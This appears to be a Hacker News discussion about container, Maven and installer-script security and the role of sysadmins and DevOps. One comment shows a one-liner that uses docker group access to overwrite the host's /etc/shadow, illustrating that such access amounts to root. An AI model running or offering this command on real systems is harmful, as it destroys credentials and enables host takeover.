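For contrast, a sketch of what a more pinned-down version could look like (the package version string is a placeholder for whatever build you actually audited, and with Docker 1.6+ the FROM line could pin a content digest instead of a tag):

  FROM centos:centos7
  # install exact, audited package builds instead of "whatever is current today"
  RUN yum -y install epel-release && yum -y install nginx-1.6.3 && yum clean all
  # ship config and content from your own version-controlled repo,
  # so a rebuild next year uses the same bytes
  COPY nginx.conf /etc/nginx/nginx.conf
  COPY html/ /usr/share/nginx/html/
  EXPOSE 80
  CMD ["/usr/sbin/nginx", "-g", "daemon off;"]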


As a Java / Hadoop / Spark / Scala fan, all I can say is, it's a little embarrassing; not sure how the Java ecosystem around Hadoop became so sloppy (I witness it first hand on a daily basis). I wish more people who are concerned with security / ease of build would turn to contributing to maven, sbt, ivy and the hadoop project. Instead of hating the Java ecosystem, why not join it and make it better? Hadoop is ubiquitous, maven (and ivy / sbt) are the de facto dependency management and build tools for that ecosystem, and if it's broken (or alienating people who are used to just having make / rpm / deb for everything), then those people should join and try to make it better.

Whether you like java / maven / ivy / sbt or not, good chances you'll end up forced to work with Hadoop (Java) or Spark (Scala), both of which use maven / sbt for dependency and build.

I say, It's all open source, if it's broken, and you know where it's broken, I think the Hadoop / Java community will be happy to get suggestions / pull requests to improve it.


In theory you are right; unfortunately, at least the hadoop "community" is difficult to work with. Hundreds of JIRAs with patches sit in limbo for months/years b/c none of the paid developers at cloudera/horton bothers to take a look. Also the political things happening behind the scenes are way more complex than you might think. It is frustrating...


I for one like java/scala but am quite wary of maven&co.

All I need is a build tool. I can download a bunch of jar dependencies myself if needed. In the "old days" we just put them into the CVS repository or in a tarball to download along with the source and an ant script to build the whole thing.

Granted, this did lead to outdated libraries at times and thus potentially was a security threat in itself. But at least it didn't roll the concerns of obtaining dependencies and building into a single tool. Often it's nice to just get the dependencies and build the project your own way, e.g. in your IDE of choice. Or vice versa, obtain the dependencies on your own (e.g. plugging in a different version than recommended) and then use the automated build.

I think those things should be provided by separate, simple tools.


Why add all the missing pieces to the other tools (maven, etc) when the OS has the tool (rpm, deb, etc) with all these pieces already?

I think that is the reaction that most people have when they see maven or similar tools.


It seems rather easy and effective, for NSA-like agencies, to hide crude exploits in complex projects. An unintended effect of Snowden's whistleblowing is that it has become easier, because it has let them know that they no longer need plausible deniability.

Until Snowden, they were very cautious not to be caught, because, you know, what might happen if public opinion knew what a bunch of crooks they were? Now, they know that public opinion doesn't really care, and that if they're caught, they can mostly shrug it off, with politicians' complicity.

So, shoving a rather crude and detectable exploit in a messy product has become practically doable. If I were in charge of subsidies distribution for some 3-letters agency, I'd pour more money on Docker, Maven etc. than on TLS.



Every once in a while someone figures out that we could entirely solve the dependency problem by packaging all the dependencies with the application. Everyone gets excited. After a while everyone gets unexcited when the problems associated with this approach become obvious.

Docker is merely a more extreme example of the "package everything with the application" idea...


I'll bite. What are the obvious problems with it? Or, "if it's good enough for Google...."

Vendoring dependencies and static linking is quite popular in executables, not just docker. Dynamic linking and shared libraries seem to be becoming a relic, deservedly.

BTW, the extreme example of "package everything with the app" is the unikernel movement.


An interesting point that I didn't see the author bring up is the concept of how Docker images can be built in a layered fashion, and the potential for a false sense of security.

For example, you start with some sort of base image -- say phusion/baseimage-docker[1] -- and proceed to layer your application on top of it. You "trust" Phusion. They do Phusion Passenger, it's a real piece of software you heard of, and it's not some random person on the internet.

At some point, there's a bug, a problem, a security flaw, and you're waiting on them to fix it... nothing, nothing. Maybe they get hacked and their base image is now infected. I haven't bothered to look, but I'm guessing it would be a trivial amount of work to start culling the most popular base images used by public Dockerfiles, looking for the biggest trojan horse.

It seems like the whole model is ripe for pushing an understanding of what is actually running on a machine -- soup to nuts -- to the wayside, and establishing a non-existent trust in the building blocks you're using, lulling people into a false sense of security about their containers. A lot of people believe that they're already doing something much more secure by running containers, and arguably, they are... except for all of the places where malicious software can be added in, and the potential container breakout techniques.

[1] https://github.com/phusion/baseimage-docker


FWIW you can easily recreate a base image by just copy/pasting the Dockerfile for that image at the top of your own.

I did this for the Jruby images we base our stack on.

I've been doing both dev and ops work for nearly a decade. I feel for what the guy is saying, but these aren't tech problems, they're process problems.

Relying on apt packages for everything makes using more recent features ridiculously hard and slows down pushing features out. I'll trade a little security to be more nimble. I say that because, as someone who's worn the hats of operations, development, and co-founder, I realize that you can't have it all. There simply isn't enough time and bandwidth in most companies.


Sure, and that's all reasonable stuff. I mostly posted this because while encouraging people to use wildly insecure installation processes like 'curl ... | sudo bash' is terrible, it's easily recognized as being terrible. To me, the Docker ethos is, perhaps, deceptively bad in terms of security. Deceptive enough that it can lull people into a false sense of security, etc etc.

I mean, we'll see if it happens. My fears might be entirely unfounded, or phusion/baseimage-docker might get trojaned. Who knows. :P


System administration is as important as ever. Docker and other containers just simplify system administration across many different machines. The standard Unix user land tools are excellent and very flexible, but they are fucking god awful at configuration management. Docker solves the problem of "how do I make sure I have the same versions and configurations of everything on all 500 of my compute nodes without having to lock them down completely?" This question is meaningless if your base system image sucks, so you still need a proper sysadmin to build your Docker images.

Many places are rolling this type of sysadmin work up into DevOps. This scares graybeard sysadmins, because they see DevOps automating them out of a job. What they fail to see is that DevOps is a step up for them: it's an explicit admission that system administration is as important as software development, and needs to be integrated into the software development process and managed through whatever management processes and tools the core dev team uses.

The ultimate driver behind this is a shift in the way technology organizations are managed. A few years ago, you would have functional silos: development, operations, product, etc. that would all contribute to one or more products. Employees reported up through the functional lead, and incentives were doled out based on cost effectiveness. This didn't work well. So what started happening is that engineering executives began building product-focused silos instead. A development manager is no longer in charge of just software developers, but also QA, scalability and deployment. If the operations folks fuck up the deployment, the development manager gets chewed out about it. So the dev manager is going to bring as much of that under her control as she can.

Docker/Maven/etc. are the abstraction layer between the teams that manage the infrastructure (physical servers, VMWare pools, storage, network, etc) and the teams that manage the applications. This is no excuse for bad sysadmin practices; you still need good sysadmins in the DevOps role. But here's the kicker: DevOps often pays more than system administration! And if you're a SME in a very specific thing (say, Cassandra administration) you can be in a support role across a number of different teams, making sure their DevOps folks deploy Cassandra in a sane way.

(Yes, I realize all of this is centered on huge companies with massive engineering organizations. Small organizations have always required sysadmins to wear multiple hats, so none of this is new.)


Sorry, I don't see a response to the key point here. If Docker doesn't sign its containers and doesn't check signatures before applying one to a running system, then it's simply not secure. It may be one little feature of all the things Docker does for you. But that's what's lacking according to the blog post's author.


But Docker does sign containers and has since 1.3. It needs to be configured properly though. Maven signs packages by default and won't install dependencies unless the checksums match (large orgs run their own Maven repositories and only proxy trusted repositories).

This is why you still need system administrators. We just call them DevOps now. Any decently large organization would have a Docker SME whose job it is to know how to set up Docker securely.


Many places are rolling this type of sysadmin work up into DevOps. This scares graybeard sysadmins, because they see DevOps automating them out of a job.

Nope, not really. Just wait till you move to a new job and you inherit a docker/rockit/etc system. You need to patch openssl/glibc/etc; however, half the containers are built with an old build system that's been replaced. You've got 15 containers based on fedora20 which is EOL, and one of your apps relies on a bug in fedora21 which is also EOL.

Oh yeah, it's just you, you have no resources, and you're on call to fix it when it fails (yeah, devops is a nice way of saying unpaid overtime).

Oh, and you need to replace two of three physical hosts, but you can't hot-migrate containers, and you lose quorum on your cluster if you take one of the hosts down.

Look, it's as simple as this. I'm a sysadmin. I know, I know, you think I can't code, you think I know nothing about programming. This is bollocks. Two things: One, I've seen this all before. Containers? Yeah, that's just fancy batch processing. Two, you know how whenever you log in to a new machine all your files are there, and not only that, it's faster than your laptop? That's me, making things fast. It's my job.

DevOps is a step up

Not really, it seems to be a way of getting devs to do out-of-hours work. Or allowing people with no experience of programming to do programming, or people with no experience of infrastructure to do infrastructure. A decent system admin does all of the "devop" things already. If they don't have a build system and git/svn-controlled config management, then they aren't real sysadmins, they are overreaching helpdesk monkeys.

fucking god awful at configuration management

dunno what you've been using, but I can configure 5000 machines inside 15 minutes with 10 lines of code and one ssh command.
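
For the curious, the 10-lines-and-one-ssh-command claim looks roughly like this (host list and command are illustrative, and it assumes key-based ssh and sudo rights):

  while read host; do
    ssh -n -o BatchMode=yes "$host" 'sudo yum -y update openssl && sudo service nginx restart' &
  done < hosts.txt
  wait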

A few years ago, you would have functional silos

Only in certain companies. If you have politics, you'll get silos.

Docker/Maven/etc. are the abstraction layer between the teams

You can't use technology to overcome procedural problems. If your teams aren't talking, your infrastructure is going to be shit. If your teams don't think about others when they produce their products, then things will fall through the cracks.

An example: say you want 10 VMs of x size. If you have a cohesive system, you could email/phone/talk to a guy and you'll have some machines. If your provisioning team had thought ahead, they'll have made an API that spins up machines, ties them to your accounting code, and configures them for your environment. That's not technology, that's just good practice.


Bad DevOps is bad. But bad DevOps is basically no worse than what people were doing before: you'd just have a bunch of VMs running fedora20 with no way of easily patching all of them at once. Except some of the VMs may be running fedora23 because they were part of an expansion that happened 2 years after the original set and the guy who deployed them couldn't find a fedora20 image. And at least with a container, you can more easily use AWS for spare capacity/redundancy while you migrate servers. DevOps doesn't fix every sysadmin problem, but it gives you a lot more options that can be developed/deployed in a small amount of time.

DevOps is bad when you take your worst developer and say "do sysadmin tasks and still write application code". It works much better when you take an experienced sysadmin and embed them into a dev team. Make them do code reviews on deployment scripts with a developer, assign tasks within sprints, etc. Code reviews aren't because you don't know how to code -- IMO the primary benefit of code reviews is the education of the reviewer. Likewise, the sysadmin's struggles become the developers' struggles, and the developers are more likely to write applications that are easy to support if they have some role in supporting them.

Every company over a certain size has politics. It's unavoidable. Maybe Google doesn't -- I don't know. But not every company can be Google. You can't use technology to overcome process problems, but you can and should use technology as a part of a redesigned, better process. DevOps gives you more options, and has a positive effect on the culture of a development org. It asks them to think of portability and supportability as a concern.


> Update: it was pointed out that this started way before Docker

Yes, like in the 90's, at least, when people started using Java. Even prior to Maven there were jars, and we didn't really know what was in them. And prior to that, I didn't understand how every piece of software or hardware worked.

I was a big proponent of Gentoo when it came out because of building everything from source, but the fact is: I don't have time to look through and understand every line of code. Even compilers can and have injected malicious behavior in the past. Firmware cannot even be trusted.

Some level of trust and reliance on others needs to be there. While it is true that there will always be people that betray that trust, without the trust, we would be hermits living alone off the land- which may not be so bad, but that's another story.


> »Docker is the new 'curl | sudo bash'«.

Fully agree with this.

Maybe I am just another grey-bearded grumpy developer, but the new generations that grew up with GNU/Linux instead of UNIX bash the security of other OSes and then go running such commands all the time.


Sad really.

docker, and any user in the group docker - or, let's say, any user capable of sending commands to the docker daemon running as root - is root on that system.

  docker run -v /:/f -w /f yourimage /bin/bash -c "echo root:and:so:on > /f/etc/shadow"


I think the author is mixing up a few different topics. If you're going to blame container frameworks for people sharing software in insecure ways you might as well blame the fact that executables are portable between compatible systems. Might as well blame the fact that there's a network while you're at it. We run docker throughout our infrastructure, but it is a deployment and dependency management technology, not a vector for infection. We run only our own images, which are all built from source or validated binaries. So what do insecure or unreliable practices have to do with containers, specifically?


The article is not an attack on Docker, but on the way it's being used by many.


>> This rant is about containers, prebuilt VMs, and the incredible mess they cause because their concept lacks notions of "trust" and "upgrades".

Oh, ok.


For people who are interested in learning more about the problem, this is a really great paper: https://www.informatik.tu-darmstadt.de/fileadmin/user_upload...


"Maven, ivy and sbt are the go-to tools for having your system download unsigned binary data from the internet and run it on your computer." You should setup a maven repository (Nexus, Artifactory) for your organisation if you want to have more control on binaries. Seems that artifactory can host docker files: https://www.jfrog.com/confluence/display/RTF/Docker+Reposito...


Kind of what I was going to say... The article seems to blame the tools, but there are more secure ways of using these same tools.


Right, do folks really believe Maven, Ivy, Gradle, sbt are tools you use in production? These are developer tools for use on workstations and CI servers. If you want to promote your stuff to other environments like production, use your own private repository (Nexus, etc).


They may be if you have a team without much sysadmin experience. The way you develop could be the way you deploy to production.

These are the same teams that have overprivileged accounts for the database or sudo-enabled users running applications or chmod 777 all over the place.

Even things like Chef cookbooks have this going on. If you want to build from source because it's not in your repository, then you're necessarily going to need to drag in sbt or gradle. (see https://github.com/hw-cookbooks/kafka/blob/develop/recipes/d... as an example). Sure you could figure out the mirrors and download the correct binary from the website. You could also use this recipe to compile everything and then package it up to host yourself. (Both of these actions require writing custom recipes). Not everyone has time to do this, and this magical recipe you found online works great on the development server! Just add it to the production server and now we've just used sbt in production on a software team.


Is it a coincidence that all the technologies the OP complains about are Java (Hadoop, Apache Bigtop, Maven, ivy, sbt, HBaseGiraphFlumeCrunchPigHiveMahoutSolrSparkElasticsearch)?


I don't think it's a coincidence. The Java ecosystem is intentionally isolated from the Unix ecosystem, because one of Java's goals was portability in an age when Windows, Mac, and Linux were all very different operating systems with very little in common. Java has its own Java-y build infrastructure, which relies much less on the concept of "trusting the source", and much more on the simple fact that the JVM is a sandbox that can be tuned to whatever security requirements the sysadmin desires.

Running Java apps (especially Docker-ized Java apps) is less like installing a Unix package (even if it's masquerading as doing so), and more like starting an instance of some untrusted VM image on your (software-defined-)network. It can use some of your computer's resources, but it has no permissions to touch any of your data or services unless you grant them to it. It really is like an app, or a web page.


Node/npm should get a mention. On a simple static website I've seen, a couple of grunt tasks end up pulling in over 14,000 files. And a hugely nested directory structure.

Part of it is the ... interesting ... idea that individual functions should come in their own module. Some npm modules are literally 6 lines of code. But they get packaged up just like everything else. There's no concept of having a stdlib or something. (Apparently node/v8/minifiers aren't smart enough to do a good job if you use a stdlib.)


I imagine they are just involved with the java ecosystem so the examples they know involve java.


I completely agree with this except I think of it more as a problem of release engineering rather than system administration.

The trouble is, the sysadmin's job is to deploy things. The developer's job is to write code. Often release engineering isn't thought of at all, or if it is, it's given to the least qualified or least suspecting folks without any requirement from operations.

Developers aren't taught about release engineering or deployment in school at all. In fact, it seems to me most university curricula do everything possible to hide all that from students.

Compounding that is the developers desire to get new code out conflicting with the sysadmins requirement to keep things stable in the face of limited QA automation. This leads to the common conflict between dev and ops.

This is to me a large part of what has led to the DevOps movement. This gives the developers information about the deployment and perhaps even access to it or a version of it and/or a voice in deciding how things are deployed.

Hopefully we can standardize things widely enough that universities can teach this without fear of focusing on useless technologies that will be discarded in 3-5 years.


As an ex sysadmin I really like the container infrastructure. Manage the whole configuration on the main machine with puppet and deploy the blackbox applications (everything ruby and java related) with docker/rocket.


It's nice to have the option. Containers are awesome for many things/projects, but sometimes you just want to run the damn application on a server of your choice, without any container stuff.

I can't remember what the application was, but I've seen an application where the only installation instructions were for Docker. That's just plain silly.

My concern with containers is that the wrong people will use them. There is a ton of software out there which just barely runs and makes all kinds of assumptions about its environment. I fear that rather than design better, more correct software, these people/companies will start packing up their development environments as containers (more or less) and just ship those. Of course that's no reason to discourage the use of containers, we just need to be critical of what is inside them.


Maybe you can send a copy of your BRMS to your competitors while you're at it.


Today I learned that the "curl | sudo" idiom is actually a thing people really do. Truly, everything is awful.


If you want to have guaranteed runtime linkage built from trusted source, you might want to give BOSH (http://bosh.io) a look for config/release management - it insists on (or at least prefers) compiling all dependencies from source, from trusted links, with signature checks. For example with Hadoop, here is the build script:

https://github.com/cf-platform-eng/hadoop-boshrelease/tree/m...

The learning curve is a bit steep, but it's another approach to this immutable infrastructure trend that's built for large production environments, enables rolling canary upgrades, etc.


And before "curl | sh" it was download from freshmeat and run "tar xfz; cd; make install".

It's not really better. Fact is we are running huge and complicated frameworks with lots of dependencies. These technologies are new and evolve fast. Distros don't have enough volunteers to decouple this mess and thus fail to provide stable packages. There is a good chance nobody wants an old version of hadoop anyways.

Containers are a whole other problem. It has always bothered me that no one cares about building these images themselves. The documentation is there; you can build your own docker/vagrant/... containers and VMs. It's just that nobody seems to care anymore. Sometimes I don't even know where these images come from: distro, community, ...?


I think it's because people are getting worse at explaining things and writing docs.

As a student many times I wanted to learn how things work, but most tutorials/docs just ask you to type in a few magical lines without much explanation. Maybe the authors think their audience won't understand anyway, but I think it's the authors' ineptitude if they can't explain what their programs do in an accessible way.

I really hope there could be more projects like i3[1] and flask[2].

1: http://i3wm.org/docs/userguide.html 2: http://flask.pocoo.org/docs/0.10/


It's not just system administration...

Minecraft is a meta-game about downloading unsigned JARs from the 'net and running them with your own user account.


I've often thought about just offering my services as a sys-admin to the multitude of small startups that pop up locally. Many, many developers -- almost no sys-admining skills amongst them. Just fire up a server on AWS and away you go.


The 'curl | sudo bash' mention reminds me of OS X Homebrew. The one-liner installation script is still published on the home page, front and center (though it's served from a trusted source, GitHub).

http://brew.sh/

One might argue that the ease of that one-liner installer script is exactly what made Homebrew gain popularity. And a dev machine is different from a production environment in terms of installed packages. Still, I agree that proper container management on the local network and perhaps new security features from upstream container vendors would help the situation.


I agree, I think accessibility made it popular. Security and ease of use are usually opposing forces.

The article has some interesting discussion points. I don't understand the absolute fear of | bash installers. It's open source, read the script. That's the argument people make for `./configure; make; make install` programs. I think it's because it's new, or it's too easy.
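
Although "read the script" only really works if you download it first instead of piping it straight into a shell (URL is illustrative):

  curl -fsSL https://example.com/install.sh -o install.sh
  less install.sh        # actually read it
  bash install.sh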

But the article does have a point about trusted containers. But security isn't a download or a product anyway. Security isn't even guaranteed.


So, asking the obvious question: what's the solution to that?


The obvious question is: what's the real problem with that?

A container is a container; as long as docker itself has no bugs, the container can only harm the container's contents.

Most problems exist in the custom-created software in the container (e.g. web services with bugs, backdoors, ...); this will be a problem for Docker, VMs, real servers, whatever, too.

The real problem is the interoperability of different containers: if you link all your data, without any audit, into another container, you can have a problem, but this problem is not Docker-specific.


>> A container is a container; as long as docker itself has no bugs, the container can only harm the container's contents.

Presumably a container has network access of some sort? Malicious code could start probing and attacking anything exposed that way.

>> this will be a problem for Docker, VMs, real servers, whatever, too.

The implication is that you wouldn't get into this situation with a 'Real-Server' so easily, because you wouldn't just download an image and run it, without having an update/patch strategy or having much more idea of what's going on inside it.


But you assume that a container HAS full network access. A firewall must be configured, but a firewall must be configured for a VM too. My point is that there is not such a huge difference for production systems.
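
For instance (the image name is a placeholder, and this is a sketch rather than a complete policy):

  docker run --net=none myimage                          # the container gets no network at all
  iptables -I FORWARD -i docker0 ! -o docker0 -j DROP    # or block forwarding from the docker bridge to any other interface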


>> But you assume that a container HAS full network access.

No, I'm presuming it has some sort of network access, a malicious container could (for instance) still probe other containers for vulnerabilities, serve malware etc etc without full network access.

>> A firewall must be configured, but a firewall must be configured for a VM too. My point is that there is not such a huge difference for production systems.

If you're downloading VM images from somewhere and running them without checking what's in them you'll run into the same problem, sure.

The problem being pointed out here is that when applications are bundled outside of the purview of a packager like debian you -

  - don't have as much trust in the origin of the app
  - don't have an easy way to keep up on library patchlevels etc for security


You seem to ignore or downplay all the other ways a container can cause problems, including but not limited to:

- Being a backdoor to the rest of your network (sniffing network traffic, or more simply reverse ssh-tunneling to an outside server)

- All the various "fun" botnet-related activities (spam being the king here)

- Actively serving malware to the rest of your network.

EDIT: Formatting, and well, others answered your question less specifically but more eloquently.


> A container is a container, as long as docker itself has not bug, the container can only harm the containers content.

So that holds only as long as there are no bugs and the Linux kernel is free from local privilege escalation exploits. Those seem like long odds to trust in.


The same trust I have in a VM or a RM.


Not true if the software in your VM or RM is managed by a package manager and comes from a place that issues security updates, patches etc.

One of the criticisms in the article is that much of what's going on now, either with containerisation or weird build systems like Hadoop's, misses out on this.


As a Windows/VMWare/Exchange/Cisco admin, this is all completely foreign to me. Does this indirectly make a case for paying a vendor real money to manage their product properly? All the vendors we work with provide installers that handle installing any dependencies. Updates are a few clicks. Occasionally we run into a vendor who provides installation/upgrade instructions that involve manually copying files and hand-editing config files. We replace those vendors. Error-prone people should not be doing manual file copying/editing or dependency checking, tasks that computers are orders of magnitude more competent at.

This is B2B stuff where businesses should manage their product or risk getting sued out of business. The current environment seems to be that using free or open-source products is "free, with purchase of a team of consultants". Why not just pay the money to a vendor to provide, and support, a real product?

It seems backwards to call this a sad state of sysadmin. This is like Boeing providing its leftover parts and a 9000-page manual on 747 assembly, and people complaining about the "sad state of mechanics". That's backwards. Buy a 747 from Boeing if that's what you need.


Give me the command line and I'll build anything!


> Maven, ivy and sbt are the go-to tools for having your system download unsigned binary data from the internet and run it on your computer.

Not Maven.


I'm a bit puzzled. Let's say I decide to not download the binary but build it from source. Unless I actually read the source, I'm trusting the community to have read it, which consists of other people thinking I have read it.

In my view, this is true for the OS itself. So unless I read everything, I'm fucked. And I don't. Thus I'm fucked.

Am I missing something?


This is also pretty much what happened with OpenSSL. Which is why I'm amused by the holier-than-thou attitudes in here.


> And then hope the gradle build doesn't throw a 200 line useless backtrace

This is more the fault of the language Gradle chose for its build configuration. Most build scripts are between 20 and 50 lines long, but reading through those Groovy stack traces eliminates its supposed write-once-read-many-times benefits.

Hopefully Gradleware will fix this problem for Gradle 3. They've already enabled Gradle to be configured on the fly by Java code, and could be working towards allowing any dynamic language to be a build language through an API. Alternatively, they've just employed one of the ex-Groovy developers recently made jobless by Pivotal pulling funding from Groovy and Grails last month -- they might get him to write a better lightweight DSL from scratch that parses the existing syntax but isn't weighed down by all of the present cruft.


A lot of big projects are terrible to build.

Once upon a time minimising dependencies was considered good practice. Now I get a pasting if I write clean code without reusing someone else's library... even if the suggestions don't solve my problem directly or at all, and come complete with a sloppy 'no one-click build/deploy' configuration... the kind I was embarrassed to produce on my standalone projects in my teenage bedroom days.

Shame on developers everywhere for tolerating this mess. I (am lucky enough to enjoy the freedom of choice that I) would leave a job if not allowed to start fixing such a situation from day one.

That being said, good sysadmins and developers should work out these problems properly instead of shortcutting through someone else's half arsed effort via Google.


On the one hand it's nice that developers are using more libraries and writing less from scratch. On the other hand dependencies are out of control. The one thing that really bothers me is code that depends on a particular IDE. That shit drives me up the wall.


Is this the sad rabbit hole reality of attempting to abstract every last component?


Regarding curl PACKAGE | sudo bash...

Just what do you think happens when you run `yum update` or Windows Update?

If you don't trust DNS or the network then you have serious challenges which frankly aren't even solved by air gapping file transfers.


There is some truth in this, yes. On the other hand, maven (mentioned by the author) clearly was very successful at abstracting from the tools we use. I can remember how much time I wasted with build scripts and dependency management and all that before. (And I still do on some other platforms.) The problems only arise if the abstraction is not working well enough. This might indeed be true for containers - there is maybe too much complexity in there that currently can't be properly encapsulated.


Because Docker is good at containing crap, it is used to cover a multitude of sins. Before using Docker, please simplify your install and upgrade processes.


Containers and VMs are part of the solution to this problem, not a cause. Try managing the same dependencies across N platforms rather than one container!


Fully agree with everything written there, with the exception of "apps." I believe it is not a Microsoft term, but an Apple term. Is it not?


Incidentally I feel like my admin "skills" have never improved faster than since I started working with docker.

Docker lets me iterate on system configuration faster than ever, and that means learning the details and quirks of certain software faster. Then again, I usually don't use prebuilt VMs and containers, but have to prepare them for people who don't want to pay for good sysadmins..


Nicely said, I thought I was the only one who noticed this ^_^ This is one of the reasons why I tried Docker/Vagrant images a few times and said no thanks :) I would rather spend my time and install everything on a separate server myself than have an unknown set of packages or security holes. As a few articles on HN have shown, these containers are not secure at all.


I don't think any experienced organization is going to just download containers off the internet to use on their servers. Which is why there are self-hosted registry applications that corps and big companies buy to host their own images, which they build to support their applications and which are vetted through traditional corp policy.


This "working out of the box" phylosophy is the direct result of devs using Windows and OSX platforms for creating those programs. They now think "Linux and *BSD should be as easy to use as Mac.". Indeed, the majority of devs is mediocre amateur sysadmins. They know next to nothing beyond their preffered language.


70s system software is really showing its age. Containers are just a hack to make its complexity sometimes easier to manage.


Emperor Joseph II: My dear young man, don't take it too hard. Your work is ingenious. It's quality work. And there are simply too many notes, that's all. Just cut a few and it will be perfect.

Mozart: Which few did you have in mind, Majesty?


Sys admins got relegated to tech support so web devs could add sys admin to their work flow.


Looks like a description of projects with bad build systems, not a problem with e.g. Maven. Maven downloads binaries from an HTTPS server. You can always get those libraries and rebuild them from source into your internal repository.


So I like this article and want to learn more about sysadmin/devops/whatever, but where do I go? Is Docker bad? What is a good starting point? What are best practices?


Can someone tell me what realistic security problems this mode of operation introduces that can't be mitigated/avoided with sensible network and backup configurations?


Precompiled binaries from random sources is a major security concern.


I thought this post was overly cynical and full of generalizations. I don't really understand what point is trying to be made here.

"Everybody" "Nobody" "Nobody" "None of" "everything got Windows-ized" every sentence is a broad generalization on top of cynicism so it's hard to find any value in the point trying to be made.


This is the price of devops.



What is really ironic is that none of these "tools" solves any fundamental problem of so-called version hell, and none of these containers is fundamentally different from

  ./configure --prefix=/xxxx && make && make -s install
with or without following

  chroot /yyyy
The big "innovation" of having so-called "virtual env" (they call it "reproducible [development] environment) for each "hello world" (a whole python/ruby/java/etc installation with all packages and its dependencies in your [home] project directory) solves no real problem, only pushes it to the next guy (what they call devops).

Some idiots are even advocating having a whole snapshot of an OS attached to your "hello world", and even making it what they call "purely functional" or even "monadic" (why not, if someone pays for that).

Unfortunately, there is no way to ignore the complexity of versions and package dependencies or to easily push it to "devops". Creating a zillion "container images" with just your "reproducible development environment" or a whole "OS snapshot" just multiplies entities without necessity.

A programmer must be aware of which version of which API is implemented by which version of a package or library he is using, and explicitly assert and maintain these requirements, like the very few sane software projects (git, nginx, redis, postgres) do.

btw, the GNU autotools (which give us ./configure) are a somewhat evolved real-world solution - you have to explicitly check each version of each API at compile (build) time, refusing to build in case of unsatisfied dependencies, and at install time (the package manager must refuse to install in case of a mismatch). This is the only way back to sanity, however "painful" it is.
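
In shell terms, the kind of explicit check meant here is something like (library and version purely illustrative):

  pkg-config --atleast-version=1.0.1 openssl \
    || { echo "error: need openssl >= 1.0.1" >&2; exit 1; }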


> Programmer must be aware of which version of what API implemented with what version of package or library he using and explicitly assert and maintain these requirements, like all the very few sane software projects (git, nginx, redis, postgress) do.

Except that when you're doing anything that looks like an actual end-user application (as opposed to infrastructure), you end up using dozens of libraries which themselves have dependencies, so suddenly you're supposed to "explicitly assert and maintain" hundreds of different library versions, none of which is in any way relevant to the application you're building.

I myself see Docker containers as the only reasonable way for giving a service application to people to deploy on their machines, because even the programming runtime I need is 5 years out of date on Debian/Ubuntu, and installing that stuff manually is a) pain, and b) different on every operating system.


> as the only reasonable way for giving a service application to people to deploy on their machines

Take a look at how git or nginx compiles from source on any machine imaginable.

There is absolutely no fundamental problem with ./configure; make; make install.
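
For example, building nginx from a release tarball is still just this (version picked for illustration; assumes a compiler and the usual pcre/zlib dev packages are present):

  curl -O https://nginx.org/download/nginx-1.8.0.tar.gz
  tar xzf nginx-1.8.0.tar.gz && cd nginx-1.8.0
  ./configure --prefix=/opt/nginx && make && sudo make install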


That would be the same git that's still basically unusable on windows? And have you ever tried to cross-compile it?

> There is absolutely no fundamental problem with ./configure; make; make install.

The fundamental problem is incompatible versions of dependencies. Arguably it's in linux's dynamic linker rather than a problem with configure/make. But if you need to run something that depends on libfoo 2.3 and something else that depends on libfoo 2.4 on the same machine, you need something like docker.
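
A minimal illustration (binaries and library names are made up): both programs ask the dynamic linker for the same soname, but one of them needs symbols that only exist in the newer release:

  objdump -p /usr/bin/app-a | grep NEEDED    #   NEEDED   libfoo.so.2
  objdump -p /usr/bin/app-b | grep NEEDED    #   NEEDED   libfoo.so.2
  ls /usr/lib/libfoo.so.2*                   # only 2.3 is installed system-wide
  /usr/bin/app-b                             # fails: undefined symbol introduced in 2.4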


Does it work well when you have third-party dependencies?


I think you are conflating purely functional, reproducible environments with the (for lack of a better term) Docker way of managing containers, where you just make a full disk image for everything, with lots of duplication. It is very possible to have the former while avoiding the latter. Both the Nix and GNU Guix projects succeed at this. I recommend taking a look at them to see if they address your concerns.
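
For a concrete taste with Nix (attribute names may differ between nixpkgs revisions), two shells can use different versions of the same package side by side, with no disk images involved:

  # each shell resolves its own dependency closure out of /nix/store
  nix-shell -p python27 --run 'python --version'
  nix-shell -p python34 --run 'python --version'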


I am an old-school sysadmin and I still think in terms of what the ldd command tells me, how shared libraries are implemented, how various dlopen-based FFIs work, and why I need this or that.

The other approaches, such as Java's (where we "abstract out the OS"), in practice lead only to a bigger mess, because it all boils down to the very same libc, libm, libffi and friends. The JVM is an ordinary userlevel program, so it obeys the restrictions and rules of any other userlevel program. This is the sad truth for Java zealots.
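
For instance (output abbreviated, and it will vary by system), the JVM launcher is just another dynamically linked binary:

  ldd $(which java)
  #   libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0
  #   libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2
  #   libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6
  #   ...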

Basically, one cannot ignore the OS (at least as long as you still want to dlopen and call the stuff instead of re-implementing it poorly) - it is just a wrong idea, leading to all these ridiculous FS-inside-JVM implementations and other messed-up layers of unnecessary, redundant abstractions.

System administration is still hard, and it (the necessity to think, understand and analyze) cannot be eliminated by some bunch of shell or ruby scripts and wishful thinking.


I would be interested to know why you call purely functional package management "idiotic", given that one of its main goals is to solve the problem of version hell? I.e., to make it easy for a developer to specify that application X should use version V of library Y, without interfering with other applications on your system?


Very simple. There are so-called atomic operations, or transactions, which are good enough to solve the problem. Any "pure functionality" in this context is plain nonsense.


Gentoo and BSD ports exist for a reason.


I don't have a strong opinion either way about Docker, but I understand the OP's gripes.

Stack is the new term for "I have no idea what I'm actually using".

This was great. It leaves me to wonder what "full-stack" means.

For one thing, we have a culture of trust inversion. I wrote about it in a blog post about a month ago: https://michaelochurch.wordpress.com/2015/03/25/never-invent... . The "startup" brand (and it is a brand) has won and most companies trust in-house programmers less than they trust off-the-shelf solutions. This tends to be a self-fulfilling prophecy. Because few corporations will budget the time to do something well (make it fast, make it secure, make it maintainable) it only makes sense to use third-party software heavily and use one's own people to handle the glue code, integration, and icky custom work. (That, of course, leads to talent loss, and soon enough, when it comes to build vs. buy your only option is to buy, because your build-capable people are gone.) At some point, however, you end up with a large amount of nearly-organic legacy complexity in your system that no one really understands.

